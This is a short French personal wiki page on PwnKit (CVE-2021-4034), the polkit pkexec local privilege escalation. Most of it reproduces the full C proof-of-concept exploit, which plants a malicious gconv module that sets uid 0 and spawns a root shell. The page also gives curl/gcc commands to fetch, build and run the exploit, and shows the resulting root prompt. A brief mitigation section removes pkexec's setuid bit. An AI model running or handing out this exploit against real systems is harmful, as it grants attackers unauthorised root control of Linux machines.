tech:rootkit_pwnkit_-_local_privilege_escalation_vulnerability_pkexec_cve-2021-4034
Rootkit pwnkit - local privilege escalation vulnerability pkexec cve-2021-4034
Voir aussi :
2022-01-27
12 ans que GNU/Lunix était vulnérable
Source :
cve-2021-4034-poc.c
/* * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis <moo@arthepsy.eu> * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> char *shell = "#include <stdio.h>\n" "#include <stdlib.h>\n" "#include <unistd.h>\n\n" "void gconv() {}\n" "void gconv_init() {\n" " setuid(0); setgid(0);\n" " seteuid(0); setegid(0);\n" " system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n" " exit(0);\n" "}"; int main(int argc, char *argv[]) { FILE *fp; system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'"); system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules"); fp = fopen("pwnkit/pwnkit.c", "w"); fprintf(fp, "%s", shell); fclose(fp); system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC"); char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL }; execve("/usr/bin/pkexec", (char*[]){NULL}, env); }
curl https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c gcc cve-2021-4034-poc.c
$ ./a.out #
Solution
Mise à jours ou
$ ls -l /usr/bin/pkexec -rwsr-xr-x 1 root root 23440 3 juin 2021 /usr/bin/pkexec $ LANG=C stat /usr/bin/pkexec |grep ^Access Access: (4755/-rwsr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2022-01-27 14:01:49.383667085 +0100 $ sudo chmod -s /usr/bin/pkexec
tech/rootkit_pwnkit_-_local_privilege_escalation_vulnerability_pkexec_cve-2021-4034.txt · Dernière modification : de Jean-Baptiste